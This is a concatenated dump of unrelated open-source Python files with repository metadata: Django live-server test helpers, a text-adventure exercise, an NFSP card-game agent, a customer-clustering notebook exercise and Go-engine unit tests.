        * the request's path isn't under the media path (or equal)
        """
        return path.startswith(self.base_url[2]) and not self.base_url[1]
    def file_path(self, url):
        """
        Returns the relative path to the file on disk for the given URL.
        """
        # Strip the URL prefix, leaving the path relative to the base dir.
        relative_url = url[len(self.base_url[2]):]
        return url2pathname(relative_url)
    def get_response(self, request):
        from django.http import Http404
        if self._should_handle(request.path):
            try:
                return self.serve(request)
            except Http404:
                # File not found under our tree: fall through to the
                # wrapped application.
                pass
        return super().get_response(request)
    def serve(self, request):
        os_rel_path = self.file_path(request.path)
        os_rel_path = posixpath.normpath(unquote(os_rel_path))
        # Emulate behavior of django.contrib.staticfiles.views.serve() when it
        # invokes staticfiles' finders functionality.
        # TODO: Modify if/when that internal API is refactored
        final_rel_path = os_rel_path.replace('\\', '/').lstrip('/')
        return serve(request, final_rel_path, document_root=self.get_base_dir())
    def __call__(self, environ, start_response):
        if not self._should_handle(get_path_info(environ)):
            return self.application(environ, start_response)
        return super().__call__(environ, start_response)
class _StaticFilesHandler(FSFilesHandler):
    """
    Handler for serving static files. A private class that is meant to be used
    solely as a convenience by LiveServerThread.
    """
    def get_base_dir(self):
        # Filesystem directory the static files are served from.
        return settings.STATIC_ROOT
    def get_base_url(self):
        # URL prefix under which the static files are published.
        return settings.STATIC_URL
class _MediaFilesHandler(FSFilesHandler):
    """
    Handler for serving the media files. A private class that is meant to be
    used solely as a convenience by LiveServerThread.
    """
    def get_base_dir(self):
        # Filesystem directory the media files are served from.
        return settings.MEDIA_ROOT
    def get_base_url(self):
        # URL prefix under which the media files are published.
        return settings.MEDIA_URL
class LiveServerThread(threading.Thread):
    """
    Thread for running a live http server while the tests are running.
    """
    def __init__(self, host, static_handler, connections_override=None):
        self.host = host
        # Filled in by run() once the OS assigns an ephemeral port.
        self.port = None
        # Signalled when the server is listening, or when startup failed
        # (in which case self.error holds the exception).
        self.is_ready = threading.Event()
        self.error = None
        self.static_handler = static_handler
        self.connections_override = connections_override
        super().__init__()
    def run(self):
        """
        Sets up the live server and databases, and then loops over handling
        http requests.
        """
        if self.connections_override:
            # Override this thread's database connections with the ones
            # provided by the main thread.
            for alias, conn in self.connections_override.items():
                connections[alias] = conn
        try:
            # Create the handler for serving static and media files
            handler = self.static_handler(_MediaFilesHandler(WSGIHandler()))
            # Port 0 asks the kernel for any free port; record the one given.
            self.httpd = self._create_server(0)
            self.port = self.httpd.server_address[1]
            self.httpd.set_app(handler)
            self.is_ready.set()
            self.httpd.serve_forever()
        except Exception as e:
            self.error = e
            # Unblock the waiting main thread even on failure so it can
            # inspect self.error.
            self.is_ready.set()
        finally:
            connections.close_all()
    def _create_server(self, port):
        return ThreadedWSGIServer((self.host, port), QuietWSGIRequestHandler, allow_reuse_address=False)
    def terminate(self):
        if hasattr(self, 'httpd'):
            # Stop the WSGI server
            self.httpd.shutdown()
            self.httpd.server_close()
        self.join()
class LiveServerTestCase(TransactionTestCase):
    """
    Does basically the same as TransactionTestCase but also launches a live
    http server in a separate thread so that the tests may use another testing
    framework, such as Selenium for example, instead of the built-in dummy
    client.
    Note that it inherits from TransactionTestCase instead of TestCase because
    the threads do not share the same transactions (unless if using in-memory
    sqlite) and each thread needs to commit all their transactions so that the
    other thread can see the changes.
    """
    host = 'localhost'
    server_thread_class = LiveServerThread
    static_handler = _StaticFilesHandler
    @classproperty
    def live_server_url(cls):
        # The port is only known once the server thread has bound a socket.
        return 'http://%s:%s' % (cls.host, cls.server_thread.port)
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        connections_override = {}
        for conn in connections.all():
            # If using in-memory sqlite databases, pass the connections to
            # the server thread.
            if conn.vendor == 'sqlite' and conn.is_in_memory_db():
                # Explicitly enable thread-shareability for this connection
                conn.allow_thread_sharing = True
                connections_override[conn.alias] = conn
        cls._live_server_modified_settings = modify_settings(
            ALLOWED_HOSTS={'append': cls.host},
        )
        cls._live_server_modified_settings.enable()
        cls.server_thread = cls._create_server_thread(connections_override)
        cls.server_thread.daemon = True
        cls.server_thread.start()
        # Wait for the live server to be ready
        cls.server_thread.is_ready.wait()
        if cls.server_thread.error:
            # Clean up behind ourselves, since tearDownClass won't get called in
            # case of errors.
            cls._tearDownClassInternal()
            raise cls.server_thread.error
    @classmethod
    def _create_server_thread(cls, connections_override):
        return cls.server_thread_class(
            cls.host,
            cls.static_handler,
            connections_override=connections_override,
        )
    @classmethod
    def _tearDownClassInternal(cls):
        # There may not be a 'server_thread' attribute if setUpClass() for some
        # reasons has raised an exception.
        if hasattr(cls, 'server_thread'):
            # Terminate the live server's thread
            cls.server_thread.terminate()
        # Restore sqlite in-memory database connections' non-shareability
        for conn in connections.all():
            if conn.vendor == 'sqlite' and conn.is_in_memory_db():
                conn.allow_thread_sharing = False
    @classmethod
    def tearDownClass(cls):
        cls._tearDownClassInternal()
        cls._live_server_modified_settings.disable()
        super().tearDownClass()
class SerializeMixin:
    """
    Mixin to enforce serialization of TestCases that share a common resource.
    Define a common 'lockfile' for each set of TestCases to serialize. This
    file must exist on the filesystem.
    Place it early in the MRO in order to isolate setUpClass / tearDownClass.
    """
    # Path to a pre-existing file used purely as a lock token; its contents
    # are never read.
    lockfile = None
    @classmethod
    def setUpClass(cls):
        if cls.lockfile is None:
            raise ValueError(
                "{}.lockfile isn't set. Set it to a unique value "
                "in the base class.".format(cls.__name__))
        # Hold an exclusive lock for the lifetime of this class's tests;
        # released when tearDownClass() closes the file object.
        cls._lockfile = open(cls.lockfile)
        locks.lock(cls._lockfile, locks.LOCK_EX)
        super().setUpClass()
    @classmethod
    def tearDownClass(cls):
        super().tearDownClass()
        cls._lockfile.close()
| 40.328928 | 117 | 0.609307 |
795548c53224910a2941780d1ab785680e574d5e | 1,091 | py | Python | ex31.py | yulwin/python-exercises | 812e28e26845d4578d1294dfdd5f5b3e9de9f0b7 | [
"MIT"
] | 2 | 2018-06-25T15:17:43.000Z | 2018-06-25T15:17:48.000Z | ex31.py | yulwin/python-exercises | 812e28e26845d4578d1294dfdd5f5b3e9de9f0b7 | [
"MIT"
] | null | null | null | ex31.py | yulwin/python-exercises | 812e28e26845d4578d1294dfdd5f5b3e9de9f0b7 | [
"MIT"
# Exercise 31: a tiny two-door "choose your own adventure" game driven by
# console input. Unrecognized answers fall through to catch-all endings.
print("""You enter a dark room with two doors.
Do you go through door #1 or door #2?""")
# strip() tolerates accidental surrounding whitespace in the typed answer.
door = input("> ").strip()
if door == "1":
    print("There's a giant bear here eating a cheese cake.")
    print("What do you do?")
    print("1. Take the cake.")
    print("2. Scream at the bear.")
    bear = input("> ").strip()
    if bear == "1":
        print("The bear eats your face off. Good job!")
    elif bear == "2":
        print("The bear eats your legs off. Good job!")
    else:
        print(f"Well, doing {bear} is probably better.")
        print("Bear runs away.")
elif door == "2":
    print("You stare into the endless abyss at Cthulhu's retina.")
    print("1. Blueberries.")
    print("2. Yellow jacket clothespins.")
    print("3. Understanding revolvers yelling melodies.")
    insanity = input("> ").strip()
    # Membership test replaces the chained `== "1" or == "2"` comparison.
    if insanity in ("1", "2"):
        print("Your body survives powered by a mind of jello.")
        print("Good job!")
    else:
        print("The insanity rots your eyes into a pool of muck.")
        print("Good job!")
else:
    print("You stumble around and fall on a knife and die. Good job!")
79554a14e0621cd298c3d25105c04b39ccdea707 | 144 | py | Python | Algorithm/Datatype/__init__.py | XuXuClassMate/My_Test_PyProject | 5822455af47f5855d1db4c388c2c973c440a4d3f | [
"Apache-2.0"
] | null | null | null | Algorithm/Datatype/__init__.py | XuXuClassMate/My_Test_PyProject | 5822455af47f5855d1db4c388c2c973c440a4d3f | [
"Apache-2.0"
] | null | null | null | Algorithm/Datatype/__init__.py | XuXuClassMate/My_Test_PyProject | 5822455af47f5855d1db4c388c2c973c440a4d3f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author : XuXu ClassMate
# @File : __init__.py.py
# username: xuxudemac
# @IDE: PyCharm
# @Time : 2022/1/18 9:35 上午
| 20.571429 | 27 | 0.611111 |
79554a47383e1c1032fc24018e482de85d7c68f8 | 13,159 | py | Python | rlcard/agents/nfsp_agent.py | pmalhaire/rlcard | 19dbd6972c9bf1ace9ee814598e65475dd672fe5 | [
"MIT"
] | 1 | 2020-08-27T10:20:26.000Z | 2020-08-27T10:20:26.000Z | rlcard/agents/nfsp_agent.py | pmalhaire/rlcard | 19dbd6972c9bf1ace9ee814598e65475dd672fe5 | [
"MIT"
] | null | null | null | rlcard/agents/nfsp_agent.py | pmalhaire/rlcard | 19dbd6972c9bf1ace9ee814598e65475dd672fe5 | [
"MIT"
] | null | null | null | # Copyright 2019 DATA Lab at Texas A&M University. All rights reserved.
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Neural Fictitious Self-Play (NFSP) agent implemented in TensorFlow.
See the paper https://arxiv.org/abs/1603.01121 for more details.
'''
import collections
import random
import enum
import numpy as np
import tensorflow as tf
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.utils.utils import remove_illegal
# One supervised-learning sample: an observation together with the action
# distribution recorded for it.
Transition = collections.namedtuple('Transition', ['info_state', 'action_probs'])
# During an episode the agent follows either its best-response (RL) policy or
# its average (supervised) policy.
MODE = enum.Enum('mode', ['best_response', 'average_policy'])
class NFSPAgent(object):
    ''' NFSP Agent implementation in TensorFlow.
    Combines an inner DQN (the best-response policy) with a supervised
    "average policy" network trained on the agent's own past best-response
    actions, per https://arxiv.org/abs/1603.01121.
    '''
    def __init__(self,
                 sess,
                 scope,
                 action_num=4,
                 state_shape=None,
                 hidden_layers_sizes=None,
                 reservoir_buffer_capacity=int(1e6),
                 anticipatory_param=0.1,
                 batch_size=256,
                 train_every=1,
                 rl_learning_rate=0.1,
                 sl_learning_rate=0.005,
                 min_buffer_size_to_learn=1000,
                 q_replay_memory_size=30000,
                 q_replay_memory_init_size=1000,
                 q_update_target_estimator_every=1000,
                 q_discount_factor=0.99,
                 q_epsilon_start=0.06,
                 q_epsilon_end=0,
                 q_epsilon_decay_steps=int(1e6),
                 q_batch_size=256,
                 q_train_every=1,
                 q_mlp_layers=None,
                 evaluate_with='average_policy'):
        ''' Initialize the NFSP agent.
        Args:
            sess (tf.Session): Tensorflow session object.
            scope (string): The name scope of NFSPAgent.
            action_num (int): The number of actions.
            state_shape (list): The shape of the state space.
            hidden_layers_sizes (list): The hidden layers sizes for the layers of
              the average policy.
            reservoir_buffer_capacity (int): The size of the buffer for average policy.
            anticipatory_param (float): The hyper-parameter that balances rl/avarage policy.
            batch_size (int): The batch_size for training average policy.
            train_every (int): Train the SL policy every X steps.
            rl_learning_rate (float): The learning rate of the RL agent.
            sl_learning_rate (float): the learning rate of the average policy.
            min_buffer_size_to_learn (int): The minimum buffer size to learn for average policy.
            q_replay_memory_size (int): The memory size of inner DQN agent.
            q_replay_memory_init_size (int): The initial memory size of inner DQN agent.
            q_update_target_estimator_every (int): The frequency of updating target network for
              inner DQN agent.
            q_discount_factor (float): The discount factor of inner DQN agent.
            q_epsilon_start (float): The starting epsilon of inner DQN agent.
            q_epsilon_end (float): the end epsilon of inner DQN agent.
            q_epsilon_decay_steps (int): The decay steps of inner DQN agent.
            q_batch_size (int): The batch size of inner DQN agent.
            q_train_step (int): Train the model every X steps.
            q_mlp_layers (list): The layer sizes of inner DQN agent.
            evaluate_with (string): The value can be 'best_response' or 'average_policy'
        '''
        self.use_raw = False
        self._sess = sess
        self._scope = scope
        self._action_num = action_num
        self._state_shape = state_shape
        self._layer_sizes = hidden_layers_sizes
        self._batch_size = batch_size
        self._train_every = train_every
        self._sl_learning_rate = sl_learning_rate
        self._anticipatory_param = anticipatory_param
        self._min_buffer_size_to_learn = min_buffer_size_to_learn
        self._reservoir_buffer = ReservoirBuffer(reservoir_buffer_capacity)
        self._prev_timestep = None
        self._prev_action = None
        self.evaluate_with = evaluate_with
        # Total timesteps
        self.total_t = 0
        # Step counter to keep track of learning.
        self._step_counter = 0
        with tf.compat.v1.variable_scope(scope):
            # Inner RL agent
            self._rl_agent = DQNAgent(sess, scope+'_dqn', q_replay_memory_size, q_replay_memory_init_size, q_update_target_estimator_every, q_discount_factor, q_epsilon_start, q_epsilon_end, q_epsilon_decay_steps, q_batch_size, action_num, state_shape, q_train_every, q_mlp_layers, rl_learning_rate)
            with tf.compat.v1.variable_scope('sl'):
                # Build supervised model
                self._build_model()
        self.sample_episode_policy()
    def _build_model(self):
        ''' Build the average-policy (supervised) network: flatten ->
        batch-norm -> tanh MLP -> linear head, trained with a softmax
        cross-entropy loss against recorded action distributions.
        '''
        # Placeholders.
        input_shape = [None]
        input_shape.extend(self._state_shape)
        self._info_state_ph = tf.compat.v1.placeholder(
            shape=input_shape,
            dtype=tf.float32)
        # Flatten is a layer class: instantiate it, then apply it to the
        # tensor. (The original passed the tensor to the constructor, which
        # is invalid and broke graph construction.)
        self._X = tf.keras.layers.Flatten()(self._info_state_ph)
        # Boolean to indicate whether is training or not
        self.is_train = tf.compat.v1.placeholder(tf.bool, name="is_train")
        # Batch Normalization, driven by the is_train placeholder so that
        # evaluation uses the moving statistics. (The original hard-coded
        # training=True, leaving the placeholder unused.)
        self._X = tf.compat.v1.layers.batch_normalization(self._X, training=self.is_train)
        self._action_probs_ph = tf.compat.v1.placeholder(
            shape=[None, self._action_num], dtype=tf.float32)
        # Average policy network: chain Dense layer calls on the tensor.
        # (Tensors have no .add() method; the original's fc.add(...) loop
        # could never run.)
        fc = self._X
        for dim in self._layer_sizes:
            fc = tf.keras.layers.Dense(dim, activation=tf.tanh)(fc)
        self._avg_policy = tf.keras.layers.Dense(self._action_num, activation=None)(fc)
        self._avg_policy_probs = tf.nn.softmax(self._avg_policy)
        # Loss
        self._loss = tf.reduce_mean(
            input_tensor=tf.nn.softmax_cross_entropy_with_logits(
                labels=tf.stop_gradient(self._action_probs_ph),
                logits=self._avg_policy))
        optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self._sl_learning_rate, name='nfsp_adam')
        # Run the batch-norm moving-average updates together with each
        # optimization step.
        update_ops = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS, scope=tf.compat.v1.get_variable_scope().name)
        with tf.control_dependencies(update_ops):
            self._learn_step = optimizer.minimize(self._loss)
    def feed(self, ts):
        ''' Feed data to inner RL agent
        Args:
            ts (list): A list of 5 elements that represent the transition.
        '''
        self._rl_agent.feed(ts)
        self.total_t += 1
        if self.total_t > 0 and len(self._reservoir_buffer) >= self._min_buffer_size_to_learn and self.total_t % self._train_every == 0:
            sl_loss = self.train_sl()
            print('\rINFO - Agent {}, step {}, sl-loss: {}'.format(self._scope, self.total_t, sl_loss), end='')
    def step(self, state):
        ''' Returns the action to be taken.
        Args:
            state (dict): The current state
        Returns:
            action (int): An action id
        '''
        obs = state['obs']
        legal_actions = state['legal_actions']
        if self._mode == MODE.best_response:
            probs = self._rl_agent.predict(obs)
            # Record the greedy best-response action as a one-hot target for
            # the supervised (average policy) network.
            one_hot = np.eye(len(probs))[np.argmax(probs)]
            self._add_transition(obs, one_hot)
        elif self._mode == MODE.average_policy:
            probs = self._act(obs)
        probs = remove_illegal(probs, legal_actions)
        action = np.random.choice(len(probs), p=probs)
        return action
    def eval_step(self, state):
        ''' Use the average policy for evaluation purpose
        Args:
            state (dict): The current state.
        Returns:
            action (int): An action id.
            probs (list): The list of action probabilies
        '''
        if self.evaluate_with == 'best_response':
            action, probs = self._rl_agent.eval_step(state)
        elif self.evaluate_with == 'average_policy':
            obs = state['obs']
            legal_actions = state['legal_actions']
            probs = self._act(obs)
            probs = remove_illegal(probs, legal_actions)
            action = np.random.choice(len(probs), p=probs)
        else:
            raise ValueError("'evaluate_with' should be either 'average_policy' or 'best_response'.")
        return action, probs
    def sample_episode_policy(self):
        ''' Sample average/best_response policy
        '''
        # With probability `anticipatory_param`, play the best response;
        # otherwise play the average policy for the whole episode.
        if np.random.rand() < self._anticipatory_param:
            self._mode = MODE.best_response
        else:
            self._mode = MODE.average_policy
    def _act(self, info_state):
        ''' Predict action probability givin the observation and legal actions
        Args:
            info_state (numpy.array): An obervation.
        Returns:
            action_probs (numpy.array): The predicted action probability.
        '''
        info_state = np.expand_dims(info_state, axis=0)
        action_probs = self._sess.run(
            self._avg_policy_probs,
            feed_dict={self._info_state_ph: info_state, self.is_train: False})[0]
        return action_probs
    def _add_transition(self, state, probs):
        ''' Adds the new transition to the reservoir buffer.
        Transitions are in the form (state, probs).
        Args:
            state (numpy.array): The state.
            probs (numpy.array): The probabilities of each action.
        '''
        transition = Transition(
            info_state=state,
            action_probs=probs)
        self._reservoir_buffer.add(transition)
    def train_sl(self):
        ''' Compute the loss on sampled transitions and perform a avg-network update.
        If there are not enough elements in the buffer, no loss is computed and
        `None` is returned instead.
        Returns:
            loss (float): The average loss obtained on this batch of transitions or `None`.
        '''
        if (len(self._reservoir_buffer) < self._batch_size or
                len(self._reservoir_buffer) < self._min_buffer_size_to_learn):
            return None
        transitions = self._reservoir_buffer.sample(self._batch_size)
        info_states = [t.info_state for t in transitions]
        action_probs = [t.action_probs for t in transitions]
        loss, _ = self._sess.run(
            [self._loss, self._learn_step],
            feed_dict={
                self._info_state_ph: info_states,
                self._action_probs_ph: action_probs,
                self.is_train: True,
            })
        return loss
class ReservoirBuffer(object):
''' Allows uniform sampling over a stream of data.
This class supports the storage of arbitrary elements, such as observation
tensors, integer actions, etc.
See https://en.wikipedia.org/wiki/Reservoir_sampling for more details.
'''
def __init__(self, reservoir_buffer_capacity):
''' Initialize the buffer.
'''
self._reservoir_buffer_capacity = reservoir_buffer_capacity
self._data = []
self._add_calls = 0
def add(self, element):
''' Potentially adds `element` to the reservoir buffer.
Args:
element (object): data to be added to the reservoir buffer.
'''
if len(self._data) < self._reservoir_buffer_capacity:
self._data.append(element)
else:
idx = np.random.randint(0, self._add_calls + 1)
if idx < self._reservoir_buffer_capacity:
self._data[idx] = element
self._add_calls += 1
def sample(self, num_samples):
''' Returns `num_samples` uniformly sampled from the buffer.
Args:
num_samples (int): The number of samples to draw.
Returns:
An iterable over `num_samples` random elements of the buffer.
Raises:
ValueError: If there are less than `num_samples` elements in the buffer
'''
if len(self._data) < num_samples:
raise ValueError("{} elements could not be sampled from size {}".format(
num_samples, len(self._data)))
return random.sample(self._data, num_samples)
def clear(self):
''' Clear the buffer
'''
self._data = []
self._add_calls = 0
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
| 38.031792 | 299 | 0.625655 |
79554b390d7a3b62608eb8304b1b186fbb83990a | 10 | py | Python | spytest/tests/system/crm/__init__.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 132 | 2016-10-19T12:34:44.000Z | 2022-03-16T09:00:39.000Z | spytest/tests/system/crm/__init__.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 3,152 | 2016-09-21T23:05:58.000Z | 2022-03-31T23:29:08.000Z | spytest/tests/system/crm/__init__.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 563 | 2016-09-20T01:00:15.000Z | 2022-03-31T22:43:54.000Z | #initfile
| 5 | 9 | 0.8 |
79554c920584ad6440c9edbd506c2ba4ed59bbb3 | 3,160 | py | Python | clusters/code.py | anupriya-babbar/ga-learner-dsmp-repo | 6692b827a06bdb6e246c1df4f2f036d8c9c9a06c | [
"MIT"
] | null | null | null | clusters/code.py | anupriya-babbar/ga-learner-dsmp-repo | 6692b827a06bdb6e246c1df4f2f036d8c9c9a06c | [
"MIT"
] | null | null | null | clusters/code.py | anupriya-babbar/ga-learner-dsmp-repo | 6692b827a06bdb6e246c1df4f2f036d8c9c9a06c | [
"MIT"
] | null | null | null | # --------------
# import packages
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt

# Load Offers: first sheet of the workbook at `path`.
# NOTE(review): `path` is not defined in this file -- presumably it is injected
# by the exercise harness; confirm before running standalone.
offers = pd.read_excel(path, sheet_name=0)

# Load Transactions: second sheet. Add a constant indicator column 'n' (one
# per transaction row) used later as the pivot-table value. A vectorized
# assignment replaces the original Python loop that appended 1 for every row
# into a temporary list -- same column contents, O(1) instead of O(n) Python
# work.
transactions = pd.read_excel(path, sheet_name=1)
transactions['n'] = 1

# Merge offers with transactions on the shared offer identifier, keeping rows
# from both sides.
df = pd.merge(offers, transactions, on='Offer #', how='outer')

# Look at the first 5 rows
df.head()
# --------------
# Code starts here

# Build a customer-by-offer matrix: one row per customer, one column per
# offer, cell value 1 where the customer took that offer. Missing entries
# become 0 and the customer name is restored as an ordinary column.
matrix = (
    df.pivot_table(index='Customer Last Name', columns='Offer #', values='n')
      .fillna(0)
      .reset_index()
)

# display first 5 rows
matrix.head()

# Code ends here
# --------------
# import packages
from sklearn.cluster import KMeans

# Code starts here

# Fit k-means (5 clusters, fixed seed for reproducibility) on every column
# except the leading customer-name column, then record each customer's label.
cluster = KMeans(n_clusters=5, init='k-means++', max_iter=300, n_init=10,
                 random_state=0)
labels = cluster.fit_predict(matrix.iloc[:, 1:])
matrix['cluster'] = labels
matrix.head()

# Code ends here
# --------------
# import packages
from sklearn.decomposition import PCA

# Code starts here

# Project the clustered matrix down to two principal components so each
# customer can be plotted as an (x, y) point. The original code called
# fit_transform twice on identical data to obtain `x` and `y`; one call
# produces both coordinates (and with the same data and random_state the
# second fit was bit-identical anyway), so the redundant refit is removed.
pca = PCA(n_components=2, random_state=0)
x = pca.fit_transform(matrix[matrix.columns[1:]])
y = x  # kept so both names remain defined, matching the original layout
matrix['x'] = x[:, 0]
matrix['y'] = y[:, 1]

# dataframe to visualize clusters by customer names
clusters = matrix[['Customer Last Name', 'cluster', 'x', 'y']].copy()

# visualize clusters
# NOTE(review): the scatter call was already commented out in the original;
# plt.show() is kept to flush any figure drawn elsewhere.
#plt.scatter(x='x', y='y', c='cluster', colormap='viridis')
plt.show()

# Code ends here
# --------------
# Code starts here
# Goal of this exercise step: find the cluster that orders 'Champagne' most.
# merge 'clusters' and 'transactions'
data=pd.merge(clusters,transactions,on='Customer Last Name')
# merge `data` and `offers`
data=pd.merge(offers,data)
# initialize empty dictionary
champagne={}
counts=[]
# iterate over every cluster
for i in range(0,5):
    # observation falls in that cluster
    new_df=data[data['cluster']==i]
    # sort cluster according to type of 'Varietal'
    counts=new_df['cluster'].value_counts(ascending=False)
    # NOTE(review): this counts the 'cluster' column of a frame already
    # filtered to cluster i, so it is simply the cluster's row count; it never
    # inspects 'Varietal', and the intended champagne check below is left
    # commented out -- the logic cannot identify the champagne cluster as is.
    x={i:counts}
    champagne.update(x)
    # check if 'Champagne' is ordered mostly
    #if counts.index[0]=='Champagne':
    #champagne={i:counts[0]}
cluster_champgane=2
# NOTE(review): the answer cluster is hard-coded (variable name also
# misspelled); presumably it was determined offline -- confirm against the
# expected exercise output before relying on it.
# add it to 'champagne'
#print(data['cluster'].value_counts())
# get cluster with maximum orders of 'Champagne'
print(champagne)
# print out cluster number
# Code starts here
# empty dictionary
discount={}
# iterate over cluster numbers
for i in range(0,5):
# dataframe for every cluster
new_df=data[data['cluster']==i]
# average discount for cluster
sum1=new_df['Discount (%)'].sum()
counts=(sum1/len( new_df))
# adding cluster number as key and average discount as value
x={i:counts}
discount.update(x)
# cluster with maximum average discount
print(discount)
cluster_discount= max(discount, key=discount.get)
#cluster_discount
# Code ends here
| 21.496599 | 83 | 0.701582 |
79554cac863aab203935f8da248afca58b716bcf | 23,125 | py | Python | tests/test_go.py | awesome-archive/minigo | 188fb197fdafbe9664a32142373b1cbd1459bc67 | [
"Apache-2.0"
] | null | null | null | tests/test_go.py | awesome-archive/minigo | 188fb197fdafbe9664a32142373b1cbd1459bc67 | [
"Apache-2.0"
] | null | null | null | tests/test_go.py | awesome-archive/minigo | 188fb197fdafbe9664a32142373b1cbd1459bc67 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import unittest
from coords import parse_kgs_coords as parse_kgs_coords, parse_sgf_coords, unflatten_coords
import coords
from go import Position, PlayerMove, LibertyTracker, WHITE, BLACK, EMPTY
import go
import sgf_wrapper
from tests import test_utils
# One empty board row ('.' per point), newline-terminated; building block for
# hand-written board fixtures below.
EMPTY_ROW = '.' * go.N + '\n'
# A mostly empty 9x9 board with a few black (X) and white (O) stones in the
# top two rows; shared starting position for several tests.
TEST_BOARD = test_utils.load_board('''
.X.....OO
X........
''' + EMPTY_ROW * 7)
# Full 9x9 no-handicap game record (Murakawa Daisuke vs Iyama Yuta) used to
# exercise SGF replay.
NO_HANDICAP_SGF = "(;CA[UTF-8]SZ[9]PB[Murakawa Daisuke]PW[Iyama Yuta]KM[6.5]HA[0]RE[W+1.5]GM[1];B[fd];W[cf];B[eg];W[dd];B[dc];W[cc];B[de];W[cd];B[ed];W[he];B[ce];W[be];B[df];W[bf];B[hd];W[ge];B[gd];W[gg];B[db];W[cb];B[cg];W[bg];B[gh];W[fh];B[hh];W[fg];B[eh];W[ei];B[di];W[fi];B[hg];W[dh];B[ch];W[ci];B[bh];W[ff];B[fe];W[hf];B[id];W[bi];B[ah];W[ef];B[dg];W[ee];B[di];W[ig];B[ai];W[ih];B[fb];W[hi];B[ag];W[ab];B[bd];W[bc];B[ae];W[ad];B[af];W[bd];B[ca];W[ba];B[da];W[ie])"
def parse_kgs_coords_set(string):
    """Parse a whitespace-separated run of KGS coordinates into a frozenset."""
    return frozenset(parse_kgs_coords(token) for token in string.split())
class TestBasicFunctions(test_utils.MiniGoUnitTest):
    """Tests for the small board-inspection helpers in the `go` module."""

    def test_load_board(self):
        """An all-dot board string loads as an all-zero N x N array."""
        self.assertEqualNPArray(go.EMPTY_BOARD, np.zeros([go.N, go.N]))
        self.assertEqualNPArray(go.EMPTY_BOARD, test_utils.load_board('. \n' * go.N ** 2))

    def test_neighbors(self):
        """Corner points have 2 neighbors; edge points have 3."""
        corner = parse_kgs_coords('A1')
        neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[corner]]
        self.assertEqual(len(neighbors), 2)
        side = parse_kgs_coords('A2')
        side_neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[side]]
        self.assertEqual(len(side_neighbors), 3)

    def test_is_koish(self):
        """is_koish returns the surrounding color only for an empty point
        ringed entirely by one color (here A9 by black)."""
        self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('A9')), BLACK)
        self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('B8')), None)
        self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('B9')), None)
        self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('E5')), None)

    def test_is_eyeish(self):
        """is_eyeish classifies eye-like points for each color on a fixed
        board; non-eye points return None."""
        board = test_utils.load_board('''
            .XX...XXX
            X.X...X.X
            XX.....X.
            ........X
            XXXX.....
            OOOX....O
            X.OXX.OO.
            .XO.X.O.O
            XXO.X.OO.
        ''')
        B_eyes = parse_kgs_coords_set('A2 A9 B8 J7 H8')
        W_eyes = parse_kgs_coords_set('H2 J1 J3')
        not_eyes = parse_kgs_coords_set('B3 E5')
        for be in B_eyes:
            self.assertEqual(go.is_eyeish(board, be), BLACK, str(be))
        for we in W_eyes:
            self.assertEqual(go.is_eyeish(board, we), WHITE, str(we))
        for ne in not_eyes:
            self.assertEqual(go.is_eyeish(board, ne), None, str(ne))
class TestLibertyTracker(test_utils.MiniGoUnitTest):
    """Tests for LibertyTracker: group bookkeeping, merging and captures."""

    def test_lib_tracker_init(self):
        """A single stone forms one group with its adjacent liberties."""
        board = test_utils.load_board('X........' + EMPTY_ROW * 8)
        lib_tracker = LibertyTracker.from_board(board)
        self.assertEqual(len(lib_tracker.groups), 1)
        self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('A9')], go.MISSING_GROUP_ID)
        self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('A9')], 2)
        sole_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
        self.assertEqual(sole_group.stones, parse_kgs_coords_set('A9'))
        self.assertEqual(sole_group.liberties, parse_kgs_coords_set('B9 A8'))
        self.assertEqual(sole_group.color, BLACK)

    def test_place_stone(self):
        """Placing an adjacent same-color stone extends the existing group."""
        board = test_utils.load_board('X........' + EMPTY_ROW * 8)
        lib_tracker = LibertyTracker.from_board(board)
        lib_tracker.add_stone(BLACK, parse_kgs_coords('B9'))
        self.assertEqual(len(lib_tracker.groups), 1)
        self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('A9')], go.MISSING_GROUP_ID)
        self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('A9')], 3)
        self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('B9')], 3)
        sole_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
        self.assertEqual(sole_group.stones, parse_kgs_coords_set('A9 B9'))
